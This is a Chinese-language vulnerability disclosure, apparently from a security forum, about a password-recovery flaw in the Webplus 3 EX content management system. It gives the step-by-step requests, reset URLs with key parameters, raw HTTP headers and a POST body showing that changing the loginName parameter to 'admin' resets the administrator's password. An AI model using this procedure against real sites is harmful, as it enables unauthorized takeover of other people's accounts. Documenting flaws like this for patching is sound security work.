苏迪科技Webplus 3 EX网站群内容管理系统，用户密码找回功能存在设计缺陷，导致任意用户密码重置。

测试操作如下：

1.由于我们没有测试账号，因此需要先注册一个账号：（注册地址默认是不公开的，让人找得好辛苦啊！~~~）

http://www.ceshizhandian.edu.cn/_web/ids/userRegister.do?_p=YXM9MSZwPTEmbT1OJg__

一定要填写：密保问题和密保答案哟！

2. 找回密码：

http://www.ceshizhandian.edu.cn//_web/ids/initPasswordRecoveryApply.do?_p=YXM9MSZ0PTAmcD0xJm09TiY_&t=0.3189659991047933

密码类型选择“密保问题”

3. 回答密保问题

下一步：

出现这样一个link

http://www.ceshizhandian.edu.cn/_web/ids/passwordRecoveryApplyResetPassword.do?_p=YXM9MSZ0PTAmcD0xJm09TiY_&key=27b09e73-8b7d-4575-aed5-aad9fb28478a

特别需要注意的是key 27b09e73-8b7d-4575-aed5-aad9fb28478a

当然了，你此时可以用Fiddle记录一下，重置test1用户的提交数据内容，你可以发现提交的link是这样的：

http://www.ceshizhandian.edu.cn/_web/ids/resetNewPasswordRecoveryApply.do?loginName=test1&key=27b09e73-8b7d-4575-aed5-aad9fb28478a&_p=YXM9MSZ0PTAmcD0xJm09TiY_

POST 提交： 

  Accept: text/html, application/xhtml+xml, */*
  Referer: http://www.ceshizhandian.edu.cn/_web/ids/passwordRecoveryApplyResetPassword.do?_p=YXM9MSZ0PTAmcD0xJm09TiY_&key=27b09e73-8b7d-4575-aed5-aad9fb28478a
  Accept-Language: zh-CN
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept-Encoding: gzip, deflate
  Host: www.ceshizhandian.edu.cn
  Content-Length: 40
  Connection: Keep-Alive
  Pragma: no-cache
  Cookie: JSESSIONID=6A7CA28760FC74156AC23F20AE72524B; validateImageValue=4963

 

提交内容：newPassword=sexsex11&rePassword=sexsex11

如果将loginName=test1换成loginName=admin是否可以修改admin用户的密码？

答案是肯定滴！

​